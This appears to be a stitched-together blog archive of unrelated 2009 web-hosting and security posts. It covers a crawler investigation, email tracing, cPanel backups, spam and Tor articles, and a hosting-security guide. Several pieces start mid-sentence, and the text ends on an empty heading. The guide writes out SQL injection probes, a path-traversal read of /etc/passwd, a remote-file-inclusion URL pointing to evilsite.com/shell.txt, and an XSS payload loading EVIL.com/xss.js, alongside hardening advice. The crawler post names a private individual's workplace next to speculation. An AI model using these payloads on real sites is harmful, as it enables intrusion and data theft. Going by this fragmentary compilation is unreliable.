Description

Matt Cutts from the Web Spam team at Google showcases the good and the bad of WordPress as seen through the eyes of Google, including basics on how Google search works and how you can boost your blog’s results in Google searches.

Video produced by John P and Dave Curlee.
WordCamp Location

San Francisco 2009
Event

WordCamp San Francisco (30)
Language

English (316)
Producer

John P (18), Dave Curlee (11)
Speakers

Matt Cutts
Date

May 30, 2009
Tags

Google (2), optimization (4), permalinks (2), relevance, reputation, Search (2), SEO (9), spam (2)
Categories

WordCampTV,

See video here:

http://wordpress.tv/2009/05/30/matt-cutts-google-sf09/

Kintiskton

Source: http://endellion.me.uk/info/Kintiskton.html

It sounds like a place-name, doesn’t it? But GOGL maps has never heard of it. Did I mean “Kingston”? Nope.
The Background

On 27 February 2009, a host with IP addresses in the range from 65.208.151.112 to 65.208.151.119 comes into the webserver unannounced, and begins to look at all my photographs at breakneck speed, in utter disregard of the robots.txt. This is not right, so I want to know more.

First off: the output of Whois shows that within the range owned by MCI Communications is a small range given over to this Kintiskton LLC thingy. These are the exact IPs I’m getting the crawls from.
[bored@Fedora httpd]# whois 65.208.151.112
[Querying whois.arin.net]
[whois.arin.net]
MCI Communications Services, Inc. d/b/a Verizon Business UUNET65 (NET-65-192-0-0-1)
65.192.0.0 – 65.223.255.255
Kintiskton LLC UU-65-208-151-112-D1 (NET-65-208-151-112-1)
65.208.151.112 – 65.208.151.119

# ARIN WHOIS database, last updated 2009-02-26 19:10
# Enter ? for additional hints on searching ARIN’s WHOIS database.

The “user-agent” reported by these Kintiskton hosts is “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”, in other words, 32-bit XP without automatic updates. In a 2007 Usenet forum post someone says that “95% of requests made to my site by this browser is spam.” This looks like a hopeful angle, but going through my own logs it does look to be legit, clicking in from Google for instance.

Googling Kintiskton leaves one with the distinct impression that there are lots of webmasters wondering why they are getting hits from this outfit, but nobody with an answer.
Looking up !NET-65-208-151-112-1 at whois.arin.net.
CustName: Kintiskton LLC
Address: PO BOX 7360
City: MOUNTAIN VIEW
StateProv: CA
PostalCode: 94037-7360
Country: US
RegDate: 2008-07-30
Updated: 2008-07-30

The Google for the actual IP address yields some info from the Project Honeynet, to wit that some spam had originated from these IP’s. Another page at Webmaster World forum goes off on the kintiskon.com angle — see below.

Someone at moveable type was worried about searches on their blog carried out by this IP. (http://forums.movabletype.org/2009/02/possible-security-compromise.html)
In my backend, i noticed there were heaps of search queries in my activity log

Search: query for ‘world vision’ 65.208.151.115 1 day ago
Search: query for ’sponsor’ 65.208.151.117 1 day ago
Search: query for ‘pet TV’ 65.208.151.112 1 day ago

My Findings

First off, “kintiskton.com” is registered since Nov 2008 to someone in Australia, who has a hilarious web of pages (on 64.202.189.170 = GoDaddy) all including the following warning:

“NiteLyf.com [or whatever else] is protected by the World Internet Names Numbers Authority (WINNA) and is also protected by the World Internet Property Protection Organization (WIPPO) and cannot be copied or duplicated in any way or form. If any human, person, child, animal, plant, computer, alien, rock, company, business or thing is found to have used information from this site, they or it will be reported to the World Internet Authority (WIA) where they will have their World Internet privileges terminated indefinitely and will be black listed from all use of the World Internet. “

I tremble before them. Never wanted to use the World Internet anyway. I don’t think their WIPPO is related to WIPO, which seems to be a legit offshoot of the United Nations. The directors of both WIPO and WIPPO are Australian, but that hardly implies a link between them. Much less can I tie WIPPO, nor yet WIPO, which interestingly is dedicated to intellectual property, to the IP addresses doing the scanning.

The kintiskton.com masters have disabled right-clicking on their site. Instead of the usual menu a pop-up appears:

Which is yet another domain registered by this hilarious joker with delicious delusions of grandeur in Queensland, who, when he is not registering domain names, likes to jump off ferry boats and swim to the houses of important people. Quite a few of the domains trace back to Seoul.

Either way, by the looks of things, this has not a lot to do with the actions of 65.208.151.112 et.al., even though there are some tantalising aspects here.

Next up is kintiskton.net (created 25 Feb 2009 — 2 days ago!) running on secureservers.net (64.202.189.170 — godaddy parking, I thought, but also forwarding now?), which redirects to creeva.com (hosted by midphase.com).

They’re having a baby. Creeva says: “I am a writer sometimes, a computer security professional at others. I have strong feelings on many things and could care less about what I deem unimportant. I am myself and no other.” It never ceases to amaze me how many computer security professionals there are in this world.

Creeva.com was registered in 2006, but both domains were registered by Brent Gueth. The address given is 2100 Apollo Drive, Brook Park, Ohio 44142. This is an 18.000 sq ft property rented by Lockheed Martin Information Technologies, subcontracted by NASA. My conspiracy hair is starting to stand upright.

Originally creeva.com had a much more domestic address in Asland, OH. If the later is Brent’s place of work and the earlier his residence, then he would have a 55 mile trip to work. That is perfectly doable, I suppose. I can’t place any Symantec buildings in Brook Park, though, but that might just be my impatience with Gogl.

Could it be that Mr Gueth has nothing to do with the website crawling? Perhaps he was a victim and registered the domain for reasons of personal interest?

Lastly is kintiskton.org, which was registered in Canada (tucows) and running in Slovenia from IP 84.255.194.203 (“T-2 Access Network”), on 26 February 2009 — yesterday!

This has something to do with (as in: it gets forwarded to) eDition-on.net, which was registered, also through tucows, by someone from Ljubljana. From the page: “Digitalne publikacije so uporabno marketinško orodje, ki poveča obseg bralcev, prihrani stroške za tisk in distribucijo, poveča prodajo, hkrati pa bralca popelje skozi obogateno interaktivno vsebino.” I don’t think these are involved either, even though there is a great deal of obfuscation going on with the use of contactprivacy.org.

One conclusion in need of drawing here is that there is incredible interest in kintiskton-related registrations. Maybe I should do some myself? I note that kintiskton.co.uk is still available.
Resolution

An attempt to run nmap on their range gets absolutely no replies: “filtered” is the result. Presumably these servers are not expecting incoming traffic and I’ve been blocked.

A traceroute to the 65.208.151.112 IP reveals that the last packets are received from alter.net:

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Documents and Settings\Administrator>tracert 65.208.151.112

Tracing route to 65.208.151.112 over a maximum of 30 hops

1 <10 ms <10 ms <10 ms 10.0.0.138
2 * * * Request timed out.
3 32 ms 32 ms 32 ms 10.1.2.5
4 31 ms 31 ms 30 ms 10.1.2.161
5 31 ms 30 ms 31 ms 79.141.38.121.available.above.net [79.141.38.121]
6 103 ms 102 ms 103 ms so-0-1-0.mpr1.dca2.us.above.net [64.125.27.57]
7 103 ms 102 ms 102 ms xe-0-1-0.er1.dca2.us.above.net [64.125.27.25]
8 103 ms 102 ms 103 ms xe-1-0-0.er2.dca2.us.above.net [64.125.27.22]
9 103 ms 103 ms 103 ms 64.125.31.210
10 105 ms 105 ms 104 ms above-uu.iad10.us.above.net [64.125.13.174]
11 105 ms 104 ms 105 ms 0.ge-4-3-0.XL4.IAD8.ALTER.NET [152.63.40.230]
12 181 ms 181 ms 181 ms 0.so-4-0-0.CL2.PHX2.ALTER.NET [152.63.117.70]
13 181 ms 180 ms 180 ms 213.ATM7-0.GW1.PHX2.ALTER.NET [152.63.113.253]
14 * * * Request timed out.
15 * * * Request timed out.
16 * * * Request timed out.
17 * * * Request timed out.
18 * * * Request timed out.
19 * * * Request timed out.
20 * * * Request timed out.
21 * * * Request timed out.
22 * * * Request timed out.
23 * * * Request timed out.
24 kintiskton-gw.customer.alter.net [63.114.61.170] reports: Destination net unreachable.

Trace complete.

This “alter.net” domain, which is clearly responsible in some way for traffic going to the 65.208.151.x range belongs to another Verizon Business, called MarkMonitor. From their whois-entry:

MarkMonitor, the Global Leader in Enterprise Brand Protection

Domain Management
Online Trademark Protection
Online Channel Protection
AntiPhishing Solutions

And suddenly their interest in my photographs is resolved, along with the rather odd search queries the blog owner reported on the movabletype forum. They make perfect sense in terms of potential copyright infringement.

Of course having a public webserver renders one liable to visits from the public, and the only way to have a safe server is to unplug it from the mains. But MarkMonitor not only saw fit to load almost all my photo albums (thank heavens my bandwidth doesn’t cost per GB…), they also did this in just under 3 hours. My poor little server has been slogging its little socks of, and all that because some dumb cnuts think there might be a picture hidden among my snapshots that their hallowed customers might own the copyright to?

MarkMonitor (CEO Irfan Salim shown left) of course do not have to obey the robots.txt because they obey the far greater overlord of commerce. Says Markmonitor’s founder Faisal Shah on the event of the start of their alliance with LexisNexis: “Through Markmonitor’s service, Lexis-Nexis customers will have access to easy, affordable technology for managing the daunting task of combing thousands of Web sites that could potentially be a problem [my italics]” (source). Cheers chaps, nice to know that I fell into your problem radar, but your range has been banned from my server now.
What is Kintiskton?

Now I am left with just one question: what on earth is Kintiskton when it’s at home? It’s not a surname, not a place name in the USA, UK, Australia… It’s not an anagram for anything sensible. It’s not in the OED or the Who’s Who. It isn’t found in the Gale Databases.

It is not K. Sitnik (shown left), or is it?

Answers on a postcard please, or maybe email.

28 May 2009 — additional

Microsoft is launching a new search engine, called “bing” (http://bing.com/) to replace their wretched “Live Search.” And who registered bing.com if not my good friends at MarkMonitor.

This also seems to be a good moment to point out that in terms of Copyright Infringement, the list of unwelcome data-grabbing crawlers visiting my website has grown, and now includes entities such as “Lloyds TSB Asset Management.” At least they identified themselves, which cannot be said for all.

http://www.resolvingnameserver.com/freerns.html

Need a resolving name server fast?
Use our free public resolving name servers!

Who can use these servers:
These servers can be used by users that need a resolving name server for normal “end user” functionality. “End User” fucntionality includes web surfing and normail email sending (via an email client). These can also be used by ISPs to give to their clients as the resolving name servers (that do not need to run enterprise services).

Who should not use these free servers:
Any system that serves an enterprise functionality. This includes email servers, web servers, etc. For services for enterprise functionality please contact our sales team. If a mail server uses these servers you may get incorrect results.

Our current set of name servers that you can use are:

• 205.234.170.215
• 205.234.170.217

Notifications of all changes of IPs will be received by subscribers to our mailing list. You can subscribe to our list by sending an email to freepublicdns-subscribe@resolvingnameserver.com and following the instructions in the reply.

How To Trace An Email

What is an email header?

Each email you receive comes with headers. The headers contain information about the routing of the email and the originating IP of the email. Not all emails you receive can be traced back to the originating point and depending on how you send emails determines whether or not they can trace the email back to you. The headers don’t contain any personal information. At most, you can get the originating IP and the computer name that sent the email. The originating IP can be looked up to determine from where the email was sent. IP address location information DOES NOT contain your street address or phone number. It will most likely determine the city and the ISP the sender used.

How do I get the email header?

Each email program will vary as to how you get to the email options. I’ll cover the basics…the rest is up to you.

• Outlook

Right click the email while it’s in the inbox and choose Message Options. A window will open with the headers in the bottom of the window.

• Windows Live Mail

Right click the email while it’s in the inbox, choose Properties, then click the Details tab.

• GMail

Open the email. In the upper right corner of the email you’ll see the word Reply with a little down arrow to the right. Click the down arrow and choose Show Original.

• Hotmail

Right click the email in the inbox and choose View Message Source.

• Yahoo!

Right click the email in the inbox and choose View Full Headers.

You can see that no matter the email program, the headers are usually just a right click away.

I’ve got the header, now what?

Usually the first IP listed is where the email originated. There are exceptions to this. You’ll have to look at the information logically to deduce the originating IP.

Can any email be traced?

Yes and No. For example, someone who sends an email to your hotmail account shows in the X-Originating IP section of the headers. However, someone who sends you an email from GMail can ONLY be traced back to the GMail servers.

We’ve got more information in our Trace An Email forum.

Q:

Anybody else able to verify this as a bug? When you restore an account from a backup, the mailman list and archive (if they exist for that account) are not restored.

The mailman lists are stored in the backup file under the mm directory. Suspended lists are store under the mms directory. And list archves are stored under the mma directory. All of these exist in the backup file of the account. But when restoring the archives, the contents of these directories are not found in the correspnding directories in /usr/local/cpanel/3rdparty/mailman.

I’m just wondering if anyone else is noticing this issue or not.

This appears to be present in 11.24.2-CURRENT_32283 and in 11.24.4-RELEASE_32603.

A:

The mailing lists are backed up in the backup package. They just aren’t restored. At least in the backups that I have seen.

You can extract just the mailing lists from the backup package:

tar -xvf /backup/cpbackup/daily/user.tar user/mma user/mms user/mm

or

tar -zxvf /backup/cpbackup/daily/user.tar.gz user/mma user/mms user/mm

replace user with the username of the account and replace /backup/cpbackup/daily/user.tar with the full path to the backup file.

This will create a subdirectory in the current directory called user and in that directory will be three subdirectories mm, mma, and mms.

mm will contain mailing lists for the account, the contents of this directory should be moved to /usr/local/cpanel/3rdparty/mailman/lists.

mma will contain mailing list archives for the mailing lists on this account. The contents of this directory should be moved to /usr/local/cpanel/3rdparty/mailman/archives.

mms will contain any suspended lists for the account, usually only happens if the account in question was suspended when the backup was created. The contents of this directory should be moved to /usr/local/cpanel/3rdparty/mailman/suspended.lists or /usr/local/cpanel/3rdparty/mailman/lists if you want the mailing list to be active.

ParagonHost / TheSpamBusters
http://www.ParagonHost.com

Follow ParagonHost on Twitter
http://twitter.com/paragonhost

Internet Security Trends – Conficker Worm Expected to Influence Rise in Spam

As a provider of messaging and Web security technology, Commtouch released their most current quarterly “Internet Threat Trends” report last week. The report forecasts how computers infected by the Conficker worm could cause a meaningful rise in spam levels during the next quarter. Analysts report that around 15 million computers on a global scale have already been infected by multiple versions of the worm to date.

Here are the Q1 highlights at a glance:

• The Conficker worm infected more than 15 million computers since its first appearance last Fall.
• Loan spam jumped to the top of the list of top spam topics, with 28% this quarter.
• Users of social networking sites fell victim to new, more complex phishing attacks.
• Computers/Technology sites and Search engines/Portals are among the top 10 Web site categories infected with malware and/or manipulated by phishing.
• Brazil continues to lead in zombie computer activity, producing nearly 14% of zombies for the quarter.
• Spam levels averaged 72% of all email traffic throughout the quarter and peaked at 96% in early January. It then bottomed out at 65% in February.
• Spammers attacked large groups of an ISP’s users and moved to the next ISP in a targeted spam outbreak.
• An average of 302,000 zombies were activated each day for the purpose of malicious activity.

Download the full in depth report here.

Source: Commtouch

ParagonHost

http://www.ParagonHost.com

Virtual Graffiti

http://www.VirtualGraffiti.com

Kaspersky Lab announces the launch of Kaspersky Internet Security 2009 for Ultra-Portables.

http://kasperskyav.blogspot.com/2009/03/kaspersky-lab-launches-comprehensive.html

Cymphonix announced Network Revealer

http://cymphonix.blogspot.com/2009/03/cymphonix-provides-free-tool-to-help-it.html

Cisco Announces Intent to Acquire Pure Digital Technologies, Makers of Flip Video

http://linksys-works.blogspot.com/2009/03/cisco-announces-intent-to-acquire-pure.html

SonicWALL, Inc. , today announced the immediate availability of its new E-Class Email Security Appliance (ESA) ES8300

http://sonic-wall.blogspot.com/2009/03/innovative-email-security-protection.html

IT security and control firm Sophos is warning computer users to be on their guard following the discovery of a new large scale malicious spam campaign posing as an email from courier firm DHL.

http://sophos-enterprise.blogspot.com/2009/03/spammers-exploit-dhl-in-another.html

Astaro today announced availability of version 2.0 of its Astaro Command Center.

http://astaro-security.blogspot.com/2009/03/astaro-command-center-20-improves-vpn.html

Virtual Graffiti, Inc
“Your source for Technology and Network Solutions”
http://www.virtualgraffiti.com

ParagonHost, LLC
“Home of VIP Hosting”
World Class Internet Solutions
http://www.ParagonHost.com

A Swedish security researcher, Dan Egerstad, recently highlighted a flaw in the way many folks are using Tor, a tool for internet anonymity. He said that he had captured user names and passwords for at least 1000 email accounts, posting the details for 100 of those. Ten days after the initial disclosure, he followed up with information on how he captured the data.

Tor (aka The Onion Router) is a system designed to hide the source and destination of internet traffic by routing it through a few intermediate nodes. Software is available for most operating systems and can run in either client or server mode. The Tor network consists of many server nodes that can route this traffic, but it also has special nodes, called “exit nodes” that are the endpoints for traffic within the Tor network. Exit nodes are the ones that actually talk to the server the client was trying to reach, thus they see any traffic exactly as it will be presented to the destination.

A Tor client picks a random path through the network, using a directory server to get a list of active nodes. For each hop along that path, it negotiates a separate session key. It encrypts the packet data, along with a destination address, once per node in the path, building up a packet with multiple layers of encrypted information. Each layer can only be decrypted by the proper intermediate node. Each intermediate node only knows about its predecessor, the destination, and the key, so with more than a few nodes, the source and ultimate destination are hidden. The exit node is the last layer of the onion, what it decrypts is the data bound for the destination.

Running an exit node for Tor has some risks associated with it, as all traffic that goes to a destination site appears to originate from the exit node host. If the destination gets attacked by a denial of service or other exploit, the exit node operator would seem to be the guilty party. For this reason, Tor servers can determine whether or not they are willing to be exit nodes. What Egerstad did was to volunteer five servers as exit nodes and monitor the traffic that went by.

What his exit nodes saw was the traffic bound for various servers, much of it in the clear. He collected authentication for email servers from many users, with the ones he released being embassy workers and members of human rights organizations. He monitored the POP3 and IMAP protocols, specifically looking for keywords associated with governments. By looking at those two protocols, he not only was able to capture passwords, his exit nodes also saw all of the email stream by as it was delivered to the users.

This should come as no real surprise, unencrypted email protocols are a security hazard; they should probably go the way of telnet, and be banished from internet usage. What is more surprising, but perhaps shouldn’t be, is that people are using Tor to retrieve their email. Tor is not supposed to be a complete privacy solution, and it is not presented that way, but the difference between anonymity and privacy seem to have gotten lost.

It is a near certainty that others are doing just what Egerstad did. Governments and criminals – though it can be hard to distinguish between the two at times – both have an interest in monitoring this kind of traffic. Egerstad lists a number of suspicious exit nodes in the Tor network, any or all of which could be scanning the cleartext traffic that streams by.

In some ways, Tor is really no different than the myriad routers that internet traffic passes through; each of those presents a point where traffic could be intercepted. Tor is better in that regard, perhaps, because all but the last leg (which, of course, traverses any number of routers) are encrypted. If an encrypted protocol, SSL or an ssh tunnel for example, were used end-to-end, Egerstad’s monitoring would not have worked. With proper certificate/key handling, no intermediate node, Tor or router, can decrypt the traffic.

It is a bit ironic that one would use a service meant to provide anonymity to log in to a system using credentials that are intended to restrict access to a particular user. It is a bit like renting a room at the No-Tell Motel using your credit card. Presumably, the users had Tor installed and running for other reasons and either didn’t know or forgot to turn it off when retrieving their email. Perhaps their email client helpfully retrieves their email every few minutes without their intervention.

It should be noted that Tor does not do anything above the protocol level to anonymize traffic. Cookies, browser identification strings and other information can be used to identify who is using the connection to anyone with access to the traffic. Obviously, logging in makes that even easier. Another known threat to anonymity using Tor, even with end-to-end encryption, is timing analysis. If someone can monitor the timing of the packets at the client and those at the server, they can make a statistical correlation between the two.

Tor achieved another kind of notoriety, recently, as some of the storm worm spam started pushing it as a solution for internet anonymity. Unfortunately, users who followed the link landed on a fake Tor download page. Downloading the software did not result in any increase in their privacy, it simply installed one of the storm worm variants. It is certainly not the publicity that Tor wanted, but it could, perhaps, lead a few users to the real Tor. It is a dubious honor, but the storm worm herders must believe that the Tor name has some credibility in order to use it this way.

Tor is an excellent tool for what it does, but it certainly is not a solution to all internet communication privacy issues. As with most things, users need to understand what they are doing before they can gain the benefits of Tor. By managing the higher level identifying information correctly (perhaps by using something like Privoxy), one can use internet services anonymously with a reasonable level of comfort. Using end-to-end encryption makes it that much better.

Source:  http://lwn.net/Articles/249388/

Aggregation / Managed Hosting: http://www.ParagonHost.com

Network and Technology Solutions: http://www.VirtualGraffiti.com

Is completely secure some things to do if you are using a common CMS Google it with the word exploit make sure your version is not on there. 

Next try any Get Vars in your scripts and put a ‘ at the end of them what I mean is you have = you add ‘ so it’s yourwebsite.com/page?=’ or any other similar thing not only page= you may also try char(39) rather then only ‘ most PHP scripts will automatically add add slashes as a function in the MySQL read so when it goes to read it comments out the ‘ but most PHP that only uses addslashes protection will still be vuln to SQL injection simply using char(39) which the php script will read as a single quote. 
If you get an error you might want to check the script. 

The errors you may receive are mysql_* this is a sql injection get right on to fixing this because some one would have the ability of dumping your whole database, clients, admins, etc. 

If the errors are main()or include_failed you may have just found an LFI (Local File Inclusion) OR RFI (Remote File Inclusion)… 
If it is in a path like failed to include /test/file.ext ever then this is an LFI but is very useful to a hacker they have the ability to use 
The following to browse into other places ../../../../ if they wanted to they’d view your passwd file via ../../../../../../etc/passwd 

Well right now you’d say big Woop they got some users maybe not but still have the ability to go to any forum on 
that server and upload an avatar with PHP-EXIF data in it then include it 
Using this LFI once they have done this it will execute the code written in this LFI meaning they have access to Run PHP-Code on your server now not good at all…

Recommendations fix the script have mod security block all ../../../../../ to a certain point attempts. 

Ok next were going to discuss the abilities of an RFI and how to block it… 
So the things you can do with an RFI well lets see remotely include an PHP file that will execute its php file like so 
www.yoursite.com/file.php?file=evilsite.com/shell.txt? this php file on your server would then remotely include the other file and execute the PHP code also allowing the user access to your server.

Prevention add http:// to your mod security this way when they try remotely including a file in the URL
http://www.evilsite.com mod_security will block it.

Ok our next subject is XSS this is a tricky one on account of there are many ways around mod security blocking this… 

What can XSS do XSS means cross site scripting a hacker can execute JavaScript code on your website using this some XSS is bad which would be called permanent XSS it allows users to embed their JavaScript inside something where you wouldn’t really see it… but when you clicked they could potentially grab your cookie or any current stored browser information. 
With this they could use your cookie as their own to login as you… maybe even get password information from this 
cookie…

Now the other type of XSS is something you have to train your clients to look out for if some one ever asks for help and sends you a link that is accessing a remote website in the URL such as… 
www.mysite.com/info.php?xss=<script>src=http://EVIL.com/xss.js</script> 
Never click it what so ever… ban the person who has sent this. 

Ok now for the mod_security bans… add <script> add <body= add </script> add “> 
And this should fix your XSS problems that can actually cause damage…

As for SQL injection the way to block this is to… add ‘ or /* to the mod security be sure to add in char(39) as it’s ‘ in php and php will in fact read it from a URL and interpret it as ‘ and still launch the sql injection.

One other thing you can do that is not exactly completely necessary but will help if any one does manage to get access to your website.Is you can encrypt all your db.php/conf.php/ files so that hackers cant read the information to gain access to your mysql database or gain any other passwords/usernames you might commonly use more then once. 

Zend should fix this problem. 

Never leave any open upload scripts what so ever any open upload scripts left on your website will allow the hacker/attacker the ability to upload a file sure you can restrict them to only uploading JPG files or GIF,RAR etc.
But the only problem with that is unless you customize your upload script to check for EXIF data and clear it out of an image when uploading it then the hacker still has something to use against you.

RULE-1 -PASSWORDS
Do not use password even more then once on your servers if you do the first time some one gets your password to any 
Thing they have the ability to get into every thing on your server from there they get other peoples passwords and get more and more access over time they can take the whole hosting company…

RULE-2 -PHONE CHATS
Always request a person’s information verify every bit of it is correct also try to remember their voice because hackers will call you and try to get into people servers they can have correct information just by whoising the persons domain that their trying to get.

RULE-3 -Email CHATS
This one is a bit easier there is no emotion to what the person is trying to do…
If they slip up on one peace of information be sure to email them back and ask them to correct it before even 
Sending any thing back or touching any thing.

RULE-4 -Talking to each other
While talking to each other in public services.. or services that my be able to be taped such as an IRC…
Be sure not to mention any root passwords, client names, etc…

Part III. Securing Your Server

This is simple just go ahead and type chmod 755 /home 
Or
CD /
chmod 755 home

This may already be setup by the current hosting control panel you are using…
If not were going to nano /etc/passwd and make sure all Linux users that you don’t want having bash are set to 

I realize some hosting companies also do dedicated server companies so it wouldn’t work out if your client didn’t have 
bash to the server.
So this is mainly based for the shared hosting servers.

Part IV. PHP Configuration.
Now were going to do some things to PHP.ini
usr/local/lib/php.ini
^ On Most Systems
safe_mode = On
safe_mode_gid = Off
open_basedir = directory [:...]
safe_mode_exec_dir = directory [:...]
expose_php = Off
register_globals = Off
display_errors =Off
log_errors = On
error_log = filename
magic_quotes=On
disable_functions = show_source, system, shell_exec, passthru, exec, 
phpinfo, popen, proc_open, base64_decode, base64_encodem, proc_terminate 

Some explanations of the functions your disabling.

show_source(), Disables functions most shells use to view the source of other files one commonly 
c99, ModfiedC99 (c100), ModfiedC99(x2300)
phpinfo(), Sometimes will bring up XSS, also numeral overflows have been found while using PHPINFO() that and you don’t 
want people getting your version of PHP and etc. to attempt to exploit it if you may just be out of date or to up to 
date.
system, Allows Bash Commands Via PHP

shell_exec, Allows Bash Commands via PHP

exec, Allows Bash Commands Via PHP

popen, Almost like Bash not quite but close using PHP

proc_open, Almost like bash not quite but close using PHP

base64_decode, decodes base64 encryptions… reason for disabling also allows users with server access to bypass mod security

base64_encode, encodes base64 encryptions… reason for disabling also allows users with server access to bypass mod security

proc_terminate, Terminates Processes running on the server.

Some reasons for having magic quotes on, it disables most nullbyte attempts (%00)
And will stop a small majority of SQL injections.

Besides from Trusted Servers

This may actually be set in the host’s field of the users in the actual MYSQL table, for each user account it lets you 
Give them an IP or type any I’d recommend giving them an IP…
Although when you give them and IP don’t worry it’s not that you can only have one IP able to access that user you 
do in fact have the ability to recreate the user
over and over and fill in the IP field differently each time.

A reference Document on how to do this can be found here.

http://httpd.apache.org/docs/1.3/suexec.html

Comments:
What this will do with apache is pretty much make sure that the users can’t access other users directories on the 
Server this is a common vulnerability you get access to one site on the server and you get access to all websites on the same 
server… this protects against it. All though apache is running under each user using SuEXEC would solve that problem.

Part VI. SSH Keys.

It’s not required but it is a recommendation to setup SSH keys this way people do not have the ability to brute force your SSH server.

A tutorial on how to do this can be found here:

http://www.sun.com/bigadmin/content/submitted/ssh_setting.html 

If you do not wish to setup SSH Keys you may also use Linux host.allow, host.deny files to sort which ranges have the ability to access your server and which do not have the ability to access your server.

There are some references for this located here 

http://linux.about.com/od/commands/l/blcmdl5_hostsal.htm

And here 

http://www.userlocal.com/security/securinginetdetc.php


Part VII. BackDoor-Trojan-Rootkit Proctection & FireWall Setup


Down To The Back Door Protection 

In the even some one gets access to your server even with all the security you’ve gotten so far they might just be able to figure out one way or another to slip a backdoor in or in the case of ubiquity a botnet client,

So what exactly are some things you can do to prevent this if not stop it. 

Well I honestly don’t think you can stop things like root kits, Trojans, viruses, botnet clients etc. from being on your System.

But you can stop or remove them once their on your system, or prevent them from being ran. 

What all can a person do just by having the ability to upload a file.
Not much but once they find ways to execute what they have uploaded then you can pretty much consider them having root to your server.

At this point they can run multiple exploits that may be able to BoF(Buffer Over Flow) An process running under root on your system and from there they could get lucky and have the ability to execute code as that process. 

Another thing they can do without having root is install an botnet client once this is done they have the ability to use your servers as their own resource to take other things down.

Trojans & Viruses on Linux aren’t too much of a worry as there aren’t too many out there but the ones that are made might just have enough access to delete most of the HDD on the Linux system. 

Now a couple things I’ve researched on that can help prevent this.

—
Root Kit Hunter.
—
Description:

Root kit scanner is scanning tool to ensure you for about 99.9%* you’re clean of nasty tools. This tool scans for 
Root kits, backdoors and local exploits by running tests like: 

- MD5 hash compare
- Look for default files used by root kits

- Wrong file permissions for binaries
- Look for suspected strings in LKM and KLD modules
- Look for hidden files
- Optional scan within plaintext and binary files

——-
Comments:
I highly recommend Root Kit Hunter.
—
Download
—
http://www.rootkit.nl/projects/rootkit_hunter.html
—
Clam Antivirus
—
Description:

* Command-line scanner
* Fast, multi-threaded daemon with support for on-access scanning
* milter interface for sendmail
* advanced database updater with support for scripted updates and digital signatures
* virus scanner C library
* on-access scanning (Linux and FreeBSD)
* virus database updated multiple times per day (see home page for total number of signatures)
* built-in support for various archive formats, including Zip, RAR, Tar, Gzip, Bzip2, OLE2, Cabinet, CHM, 
BinHex, SIS and others
* built-in support for almost all mail file formats
* built-in support for ELF executables and Portable Executable files compressed with UPX, FSG, Petite, NsPack, 
wwpack32, MEW, Upack and obfuscated with SUE, Y0da Cryptor and others
* built-in support for popular document formats including MS Office and Mac Office files, HTML, RTF and PDF
——-
Comments:
Honestly I’d recommend this even when using Mod-Security I’ve built shells that will in fact bypass modsecurity well 
this well scan the source codes of the PHP shell
and make sure thereï؟½s nothing that could potentially harm or allow the user to have to much access over the system.

—
Download
—
http://www.clamav.net/download/
–

Banning The Brute Forcers, FTP, SSH, etc.
—
APF (Advanced Policy Firewall)
— 

Description: 

Rather then grabbing this one off their site I figured I’d write one. 

Well in my experience this is nothing like a normal firewall you would use on an windows system it checks for things like people trying to brute force Cpanel, SSH, FTP, etc. accounts.

Allows alot of configuration options some of which may also benfit in bandwidth saving and DDoS prevention, 
Over all it blocks those ports your not using so even if some one manages to get an undetectable backdoor/botnet on your systems.
Then this will block it from connecting back to them and them connecting back to it.
—
Comments:
I will tell you no though this will be a pain to setup while hosting so many teamspeaks on account of all the ports you would have to constantly forward.
To make sure every one has the ability to get into their teamspeaks, 

Some commands that can be used with this Firewall just incase you decide to use it.

Banning an IP
apf -d IP

Unbanning an IP
apf -u IP

I recommend ignoring your own IP in the 

/etc/apf/allow_hosts.rules 

Using the following syntax you can ignore your IP from all firewall rules meaning you don’t follow them.

d=PORT:d=IP // ENABLES YOUR IP COMMING IN ON THE PORT
out:d=PORT:d=IP // ENABLES YOUR IP GOING OUT ON THE PORT

For ranges you may do the following 192.168.1.1/255

It will then forward from 192.168.1.1 to 192.168.1.255 to be enabled

—
Download
—
http://www.r-fx.ca/downloads/apf-current.tar.gz


Part VIII. DDoS Protection and Saving Bandwith + Remote Loging.
—

Server Monitoring Remotely
—
Log Watch
—
Description: 

An application that runs twenty-four seven on your server and sends the following things after going through them to your email.
-Apache_Access Logs

-Apache_Error Logs
-SSH_LOGIN’s Failed Or Succeeded
-FTP Logs
-Mail Logs
-Current HDD Sizes
-Kernel Logs
-Mail Logs
-Yum/APT-GET Logs

Comments:
This thing is very useful attempts to gain access to your server will be automatically emailed to you along with every thing that is not found gave some one and forbidden error and etc.
The only main requirement is that you have SendMail Running.

Mail Spam Protection
—

Spam Assassin
—

Description:

The core distribution consists of command line tools to perform filtering along with Mail:pamAssassin, a set of Perl modules which allow SpamAssassin to be used in a wide range of products.

Comments:
Never used it my self because I’ve never really had to bad of mail spam problems on my server but from what I’ve 
read it is in fact pretty good at filtering out the spam in your emails.

—
Download
—
http://spamassassin.apache.org/downloads.cgi?update=200705021400 

—
Some Extra Mail Protection

—
Be sure that your mail-server only allows your Server to use it or any other servers you may trust and deny all 
others
many people will attempt to use open mail servers and spam resources.

—
DDoS Protection & Bandwidth Saving.

— 
Ok first off some things people might do while DDoSing you.

Unless theDDoS attack is very strong I highly doubt it will take your whole server offline most DDoS attacks will mainly hit their targets port
in most cases their target would be Apache, but in other cases maybe even a teamspeak it’s a little more difficult to stop without having to get all of your clients IP addresses and adding them to the ignore lists in APF 

But a basic thing you can do is have APF installed drop all ICMP packets. This will disable the ability to ping your server.
Next Install DDoS Deflate

—
DDoS Deflate
—
Comments/Description:
From my own experience an well written Perl Script that was made to run along with APF and monitor how many times an 
IP is connected to your server before it bans it you may also run it manually typing the following in shell.

ddos Number Of Connections Allowed 

When this is typed the Perl script will then run an netstat command check how many times each IP is connected and if there are more then the number of connections you specified then it will automatically run a command in APF for the IP to be banned.

—
More Information can be found on this at

http://blog.medialayer.com/projects-ddos-deflate/

—-
Download
—-
http://www.inetbase.com/scripts/ddos/

Ok now for bandwidth saving and DDoS protection at the same time there is this really cool thing made for apache servers it’s called mod_evasive
It will limit the number of connections a person may open with apache and if they open to many it will ban them for what ever time you specify in the config.

—
mod_evasive

— 

Detailed Description:
